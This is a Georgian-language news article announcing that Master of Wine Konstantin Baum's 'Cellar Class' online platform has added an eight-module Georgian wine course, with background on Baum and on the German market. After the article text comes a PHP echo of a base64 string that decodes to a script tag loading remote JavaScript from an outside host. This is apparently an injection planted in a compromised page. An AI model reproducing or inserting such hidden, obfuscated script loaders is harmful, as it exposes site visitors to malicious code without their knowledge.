gorgia
გარე ავეჯი

 გერმანელი ღვინის მაგისტრის, კონსტანტინ ბაუმის (Konstantin Baum) ღვინის ონლაინ კურსებს „Cellar Class“ (https://www.cellarclass.com/) ქართული ღვინის სასწავლო კურსი დაემატა.

კურსის ფარგლებში ქართული ღვინის სემინარი-წარდგენა მიუნხენში გაიმართა.
ქართული ღვინის ონლაინ კურსი მოიცავს ინფორმაციას ქართული ღვინის ისტორიასა და კულტურის შესახებ, ასევე ქართული ღვინის დეგუსტაციებს. ღვინის მაგისტრმა კურსისთვის სპეციალურად შეადგინა სასწავლო წიგნი და წერითი ტესტები. კურსი შედგება 8 მოდულისგან და გათვლილია ღვინის მოყვარულებისა და მომხმარებლებისთვის. კურსის შესახებ ინფორმაცია შეგიძლიათ იხილოთ შემდეგ ლინკზე: https://www.cellarclass.com/cellar-class-georgian-course კონსტანტინ ბაუმი გერმანიაში ყველაზე ახალგაზრდა ღვინის მაგისტრი და მსოფლიოში  ერთ-ერთი ყველაზე პოპულარული ღვინის Youtube არხის (https://www.youtube.com/@KonstantinBaumMasterofWine) მფლობელია, 185 ათასი გამომწერით და მილიონობით ნახვით. მას საკუთარ ონლაინ მაღაზიაში წარმოდგენილი აქვს  პერსონალურად შერჩეული ღვინოები (baumselection.com). 
 
ღვინის ეროვნული სააგენტოს მხარდაჭერით, კონსტანტინ ბაუმი არაერთხელ სტუმრობდა საქართველოს და ქართული ღვინის მარნებს. ასევე, ღვინის მაგისტრი, ქართული ღვინის დეგუსტაციებს ატარებს ევროპის სხვადასხვა ქავყანაში.
ევროპაში ღვინის უდიდესი იმპორტიორი ქვეყანა გერმანია, ქართული ღვინის სტრატეგიული ბაზრების ჩამონათვალს 2020 წლიდან დაემატა და საექსპორტო ქვეყნების ათეულში სტაბილურად დაიმკვიდრა ადგილი.
189
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");